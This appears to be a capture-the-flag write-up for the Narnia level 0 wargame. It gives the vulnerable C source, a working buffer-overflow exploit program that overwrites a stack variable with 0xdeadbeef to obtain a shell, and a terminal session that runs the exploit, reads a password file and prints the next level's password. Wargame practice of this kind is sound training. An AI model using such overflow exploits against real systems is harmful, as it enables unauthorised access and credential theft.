narnia0

/* narnia0.c */
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>

int main(){
	long val=0x41414141;
	char buf[20];

	printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
	printf("Here is your chance: ");
	scanf("%24s",&buf);

	printf("buf: %s\n",buf);
	printf("val: 0x%08x\n",val);

	if(val==0xdeadbeef)
		system("/bin/sh");
	else {
		printf("WAY OFF!!!!\n");
		exit(1);
	}

	return 0;
}

/* hacker0.c */
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
        char buffer[2048] = {0};
        int pfd[2] = {0};
        pid_t pid;

        if (pipe(pfd))
                return 0;

        pid = fork();
        if (pid > 0){
                close(pfd[0]);
                write(pfd[1], "UUUUUUUUUUUUUUUUUUUU\xef\xbe\xad\xde", 24);

                while (gets(buffer)) {
                    buffer[strlen(buffer) + 1] = '\0';
                    buffer[strlen(buffer)] = '\n';
                    write(pfd[1], buffer, strlen(buffer));
                }

                close(pfd[1]);
        } else if (pid == 0) {
                close(pfd[1]);
                close(STDIN_FILENO);
                dup2(pfd[0], STDIN_FILENO);

                execle(argv[1], argv[1], NULL, NULL);
                close(pfd[0]);
        }

        return 0;
}

root@today:~# ssh [email protected]

[email protected]'s password: 

narnia0@melinda:~$ cd /tmp/shadowcoder0

narnia0@melinda:/tmp/shadowcoder0$ ls
hacker0.c  narnia0.c

narnia0@melinda:/tmp/shadowcoder0$ gcc hacker0.c -o hacker0 -m32

narnia0@melinda:/tmp/shadowcoder0$ ./hacker0 /narnia/narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: xxxxxxxxxxxxxxxxxxxxﾭ
val: 0xdeadbeef
whoami
narnia1
cat /etc/narnia_pass/narnia1
efeidiedae